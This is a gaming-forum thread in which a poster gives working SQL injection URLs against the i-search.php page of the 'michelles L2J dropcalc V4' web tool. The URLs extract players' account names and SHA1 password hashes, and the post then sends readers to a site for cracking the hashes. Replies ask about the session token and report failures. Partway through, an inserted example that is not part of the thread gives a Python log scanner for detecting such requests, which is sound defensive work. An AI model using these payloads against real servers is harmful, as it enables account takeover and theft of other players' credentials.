Database Vulnerability


raouf67

This concerns only the michelles L2J dropcalc V4.

SQL Injection: !! You must be logged in, using your own username and Token !!

Obtain a player username with SQL injection:

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

 

!! You must put the token, User and PLAYER without the "[]" !!

Obtain a password for that username (encrypted with SHA1):

--> !! Only valid if loginserver and gameserver are on the same machine !!

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

 

Then you have the password encrypted in SHA1  :)

You must decrypt it (don't worry it's easy)

Go Here --> http://md5encryption.com/

 

Now you have the password of the player  ;D

Link to comment
Share on other sites
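
A defender-side view of the requests described in the post above, as an added example that is not part of the original thread: a log check for `i-search.php` requests whose `itemid` is repeated or is not a plain integer. The log lines, the `/dropcalc/` path, the account names and the assumption that legitimate `itemid` values are empty or decimal digits are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style); hosts, path and names are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:12:00:01 +0000] "GET /dropcalc/i-search.php?itemid=57&username=alice&token=abc123&server_id=0 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:12:03:44 +0000] "GET /dropcalc/i-search.php?itemid=&username=bob&token=def456&server_id=0&skin_id=0'
    '&itemid=-1%20UNION%20select%20null,account_name,null,null,null,null,null%20from%20characters%20where%20char_name%20=%20%22X%22 HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:12:05:10 +0000] "GET /dropcalc/i-search.php?itemid=&username=alice&token=abc123&server_id=0 HTTP/1.1" 200 310',
    '198.51.100.3 - - [01/Jan/2024:12:06:02 +0000] "GET /dropcalc/index.php?itemid=-1 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_WORDS = re.compile(r'\b(?:union|select|from|where)\b', re.IGNORECASE)

def check_request(url):
    """Return the reasons an i-search.php request looks like injection (empty list if none)."""
    parts = urlsplit(url)
    if not parts.path.endswith('/i-search.php'):
        return []
    # parse_qs percent-decodes values and keeps every occurrence of a repeated parameter.
    values = parse_qs(parts.query, keep_blank_values=True).get('itemid', [])
    reasons = []
    if len(values) > 1:
        reasons.append('itemid supplied more than once')
    for value in values:
        # Assumption: a legitimate itemid is empty or consists of decimal digits only.
        if value and not re.fullmatch(r'[0-9]+', value):
            reasons.append('itemid is not a plain integer')
            if SQL_WORDS.search(value):
                reasons.append('SQL keyword in itemid')
    return reasons

def scan(lines):
    """Return (line number, client address, reasons) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            reasons = check_request(match.group(1))
            if reasons:
                hits.append((number, line.split()[0], reasons))
    return hits

if __name__ == '__main__':
    for number, client, reasons in scan(SAMPLE_LOG):
        print(f'line {number} from {client}: {"; ".join(reasons)}')
```

The durable fix belongs in the application: treat `itemid` as an integer or pass it as a bound parameter, so that a log check like this is a backstop rather than the control.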

so on server site there must be implanted "michelles L2J dropcalculator" version 4?

 

what about [Target]/[Path]? by [Token] u mean server token?

 

oh and what about [PLAYER]?

 

ADAL13 u put it in address at your web browser

Link to comment
Share on other sites

A little bit old as it was reported at the end of January. However you provided a guide "How to" so thanks a lot for sharing.

Could you hide this post so everybody with 100 and more posts will be able to see it?

What token do you mean? Token which allows you to play on L2 server? The same which you use to run L2Walker?

Thanks

[EDIT] PLAYER means character name I suppose.

Link to comment
Share on other sites

@raouf67

I tried it on a few servers.

I am always getting "Please give at least 3 characters." so something is wrong with this sql code. I am sure I checked servers where dropcalc is v4.

Can't check if login and game server are on the same machine but I think it is.

"[PLAYER]" means character name in game?

Link to comment
Share on other sites

 

I have a few questions:

1. Token. The same token as for l2 walkers? Or from mysql sessions?

2. The michelles L2J dropcalc V4. On what l2 version is this db used: c4, c5, interlude?

3. Does this work for anyone?

 

Link to comment
Share on other sites

1. As raouf67 said "Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it."

2. So far I found C4 and one C5 server which are using l2j dropcalc V4.

3. Not working for me as I am getting a weird message "Please give at least 3 characters."

Link to comment
Share on other sites
